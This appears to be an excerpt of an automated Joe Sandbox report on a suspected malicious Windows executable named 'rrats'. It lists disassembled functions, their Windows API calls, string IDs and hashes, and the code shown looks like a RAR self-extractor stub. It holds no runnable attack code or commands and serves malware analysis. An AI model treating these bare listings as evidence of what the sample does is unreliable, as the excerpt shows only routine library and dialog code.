                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: 2e496fc1e30a7fb3e43f515eed9a260cc8f5f15671c944df68c75dfa57177e77
                                                              • Instruction ID: 606b8b88733225238a6820774c6864955b409cfde792a0abe606fb0f06b862c2
                                                              • Opcode Fuzzy Hash: 2e496fc1e30a7fb3e43f515eed9a260cc8f5f15671c944df68c75dfa57177e77
                                                              • Instruction Fuzzy Hash: 8C1133721017107BE220ABB19C4AFEF7A5CAF04741F004121FA66F2295EA65CF4596B6
                                                              Function 00CC96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00CC9705
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CC9711
                                                              • _free.LIBCMT ref: 00CC971C
                                                              • _free.LIBCMT ref: 00CC9727
                                                              • _free.LIBCMT ref: 00CC9732
                                                              • _free.LIBCMT ref: 00CC973D
                                                              • _free.LIBCMT ref: 00CC9748
                                                              • _free.LIBCMT ref: 00CC9753
                                                              • _free.LIBCMT ref: 00CC975E
                                                              • _free.LIBCMT ref: 00CC976C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 7802ade1b8a58d3a804f47cd11dd8dc2f426162915d319f4875dd491838f2a73
                                                              • Instruction ID: b537e8ecdc8c0aeea7b4c7c3ad2c72125d209ac10bc9047156b95683e9549fa1
                                                              • Opcode Fuzzy Hash: 7802ade1b8a58d3a804f47cd11dd8dc2f426162915d319f4875dd491838f2a73
                                                              • Instruction Fuzzy Hash: 1311E97550000ABFCB01EF58D842EDE3B75EF14350B0255A9FA094F262DE31DE54AB84
                                                              Function 00CC2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: b269b07b0b9f83ff0f23c6774274d2bb477364fc56ba8fdaf906b8dede01b7b8
                                                              • Instruction ID: f3fc51cf77106af9f54d67e1f8d4b6f5e7511b38bd408f6cedea0374400605cc
                                                              • Opcode Fuzzy Hash: b269b07b0b9f83ff0f23c6774274d2bb477364fc56ba8fdaf906b8dede01b7b8
                                                              • Instruction Fuzzy Hash: 02B14771900259EFCF25DFA4D881EAEBBB5BF04310B18815EE8216B212D735DB52DB91
                                                              Function 00CA6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA6FAA
                                                              • _wcslen.LIBCMT ref: 00CA7013
                                                              • _wcslen.LIBCMT ref: 00CA7084
                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3122303884-3508440684
                                                              • Opcode ID: 7242cf99ceca9c2b593a9d1c25cae2fd6c5eb94ac79dac341b31d98a22327173
                                                              • Instruction ID: 54c78cfd6adf09313937312dc59917ec6db82e466a07aa1b5c896e45091636a5
                                                              • Opcode Fuzzy Hash: 7242cf99ceca9c2b593a9d1c25cae2fd6c5eb94ac79dac341b31d98a22327173
                                                              • Instruction Fuzzy Hash: F1411BB1D08386BAEF20E7709D86FEE77ACAF06308F040555FA55A6182D774AB44D721
                                                              Function 00CBB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • EndDialog.USER32(?,00000001), ref: 00CBB610
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBB637
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CBB650
                                                              • SetWindowTextW.USER32(?,?), ref: 00CBB661
                                                              • GetDlgItem.USER32(?,00000065), ref: 00CBB66A
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CBB67E
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CBB694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: 1d5c147ee4dfd855f8a6ddb5a61bee9c493a7e989d320b4be79c8ec9e8adc706
                                                              • Instruction ID: 9f42a3025d8853399240b4c507746578bc9c7fe36b2c9f82718b8789d78dd005
                                                              • Opcode Fuzzy Hash: 1d5c147ee4dfd855f8a6ddb5a61bee9c493a7e989d320b4be79c8ec9e8adc706
                                                              • Instruction Fuzzy Hash: C721C732204319BBD6255F66ED4AFBF3B7DEB4AB41F010018F609D65E0CBA29E01D636
                                                              Function 00CBFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,86DBCCB0,00000001,00000000,00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFD99
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE14
                                                              • SysAllocString.OLEAUT32(00000000), ref: 00CBFE1F
                                                              • _com_issue_error.COMSUPP ref: 00CBFE48
                                                              • _com_issue_error.COMSUPP ref: 00CBFE52
                                                              • GetLastError.KERNEL32(80070057,86DBCCB0,00000001,00000000,00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE57
                                                              • _com_issue_error.COMSUPP ref: 00CBFE6A
                                                              • GetLastError.KERNEL32(00000000,?,?,00CAAF6C,ROOT\CIMV2), ref: 00CBFE80
                                                              • _com_issue_error.COMSUPP ref: 00CBFE93
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: 1293d1e5e11e82fa61b589dee1a789d6c5c5ef5c41c5c591f846aca4866e1028
                                                              • Instruction ID: 248ffa0f0dc1f2b8868cd22553d3eea75672cdadac8801c323067c937d2605c6
                                                              • Opcode Fuzzy Hash: 1293d1e5e11e82fa61b589dee1a789d6c5c5ef5c41c5c591f846aca4866e1028
                                                              • Instruction Fuzzy Hash: 804108B1A00259ABDB109F68DC45BEEBBA8EB48710F10823EF915E7351D735DA01C7A5
                                                              Function 00CAAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                              • API String ID: 3519838083-3505469590
                                                              • Opcode ID: 420c7de5e381ab3e9116158ed241fb9b0154bc9dfca74a5e13bd8838b124cf97
                                                              • Instruction ID: df8f749fbd8e0102be24f105cd5b739c2f64c2696e1fce1b5be3d2ebaa5d8d32
                                                              • Opcode Fuzzy Hash: 420c7de5e381ab3e9116158ed241fb9b0154bc9dfca74a5e13bd8838b124cf97
                                                              • Instruction Fuzzy Hash: A47170B0A0021AAFDF14DFA4CC95AAFB7B9FF49314B14015EE512A72A1CB306E41DB61
                                                              Function 00CA9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA9387
                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00CA93AA
                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00CA93C9
                                                                • Part of subcall function 00CAC29A: _wcslen.LIBCMT ref: 00CAC2A2
                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                              • _swprintf.LIBCMT ref: 00CA9465
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • MoveFileW.KERNEL32(?,?), ref: 00CA94D4
                                                              • MoveFileW.KERNEL32(?,?), ref: 00CA9514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: rtmp%d
                                                              • API String ID: 3726343395-3303766350
                                                              • Opcode ID: 37616650fdb388537e720dc665ea6ed7e90988f25cda8bae5bd1bef8b1ba3980
                                                              • Instruction ID: d8593ec027ba409c95f1c52e12ec5d9180e2ba150b24593d0823f86fa1f9e90f
                                                              • Opcode Fuzzy Hash: 37616650fdb388537e720dc665ea6ed7e90988f25cda8bae5bd1bef8b1ba3980
                                                              • Instruction Fuzzy Hash: 614198B1D0025A66CF21EBA0CC46EDF737CEF46344F0049A5B619E3051EB389B89EB60
                                                              Function 00CB1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 00CB122E
                                                                • Part of subcall function 00CAB146: GetVersionExW.KERNEL32(?), ref: 00CAB16B
                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00CB1251
                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00CB1263
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CB1274
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1284
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CB1294
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00CB12CF
                                                              • __aullrem.LIBCMT ref: 00CB1379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: 33de36c04a18531532a80de507fc1e3fee979134e951d5b0325b930577b594da
                                                              • Instruction ID: 48e5770b271d2b31f2a99f3c35ef2168832c1081158ba443130f047f96677e48
                                                              • Opcode Fuzzy Hash: 33de36c04a18531532a80de507fc1e3fee979134e951d5b0325b930577b594da
                                                              • Instruction Fuzzy Hash: E241FBB15083459FC710DF65C884AAFBBE9FB88314F44892EF996C2250E738E649DB52
                                                              Function 00CA2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00CA2536
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                • Part of subcall function 00CB05DA: _wcslen.LIBCMT ref: 00CB05E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                              • String ID: ;%u$x%u$xc%u
                                                              • API String ID: 3053425827-2277559157
                                                              • Opcode ID: 8bb44c30e518fa1df7c7683f1d96eb2dc2ccaedfede91be80b448c9fb5ca1c24
                                                              • Instruction ID: a82f7c690878b7ea72cc495ec56ad8b9812c442f3f8ba043d28e4e7bba2a7351
                                                              • Opcode Fuzzy Hash: 8bb44c30e518fa1df7c7683f1d96eb2dc2ccaedfede91be80b448c9fb5ca1c24
                                                              • Instruction Fuzzy Hash: 00F168716043529BCB24DF2C84D5BFE77996F9230CF08456DFC869B283CB648A49D7A2
                                                              Function 00CB9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              • Opcode ID: 6cc8543d3b7edaf92461e54abc5594595420a9e52a0d7faf9e14c4be95a393eb
                                                              • Instruction ID: 8ddb59badfdf87eaf157c227d1c6b33b07ee37b8d68a7ca5b5216e3e9cf78f92
                                                              • Opcode Fuzzy Hash: 6cc8543d3b7edaf92461e54abc5594595420a9e52a0d7faf9e14c4be95a393eb
                                                              • Instruction Fuzzy Hash: C851E56674036395DB309A769822BF673E0DFA1750F69442AFFD18B2C0FB75CE818261
                                                              Function 00CCF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CCFE02,00000000,00000000,00000000,00000000,00000000,00CC529F), ref: 00CCF6CF
                                                              • __fassign.LIBCMT ref: 00CCF74A
                                                              • __fassign.LIBCMT ref: 00CCF765
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CCF78B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,00CCFE02,00000000,?,?,?,?,?,?,?,?,?,00CCFE02,00000000), ref: 00CCF7AA
                                                              • WriteFile.KERNEL32(?,00000000,00000001,00CCFE02,00000000,?,?,?,?,?,?,?,?,?,00CCFE02,00000000), ref: 00CCF7E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: b39e2655062f000bd1c2a561f2cef8eda3a88453daad817482f2bb7c0d985a6f
                                                              • Instruction ID: 76a4c0ba8af459320be2e094976cda4bbcd3385f8fd01ee0d9d00af5c6e2c0e2
                                                              • Opcode Fuzzy Hash: b39e2655062f000bd1c2a561f2cef8eda3a88453daad817482f2bb7c0d985a6f
                                                              • Instruction Fuzzy Hash: 805141B19002499FDB10CFA8DC85FEEBBF5EF09310F14416EE555E7291D670AA42CBA1
                                                              Function 00CC2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC2937
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00CC293F
                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC29C8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00CC29F3
                                                              • _ValidateLocalCookies.LIBCMT ref: 00CC2A48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: e9a978eed9c0ac18b70e9b8458f163e6ed8fe88e37aae04469b8d0621368b7b6
                                                              • Instruction ID: bb4c7b7e56d3235fab02c3f049201f1280f5cdc4f018ca9f2fdd4678b66c38be
                                                              • Opcode Fuzzy Hash: e9a978eed9c0ac18b70e9b8458f163e6ed8fe88e37aae04469b8d0621368b7b6
                                                              • Instruction Fuzzy Hash: AE41D534E00248AFCF10EF69C885F9EBBB5EF44324F14805AE819AB392D771DA51DB91
                                                              Function 00CB9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(?,00000000), ref: 00CB9EEE
                                                              • GetWindowRect.USER32(?,00000000), ref: 00CB9F44
                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00CB9FDB
                                                              • SetWindowTextW.USER32(?,00000000), ref: 00CB9FE3
                                                              • ShowWindow.USER32(00000000,00000005), ref: 00CB9FF9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Window$Show$RectText
                                                              • String ID: RarHtmlClassName
                                                              • API String ID: 3937224194-1658105358
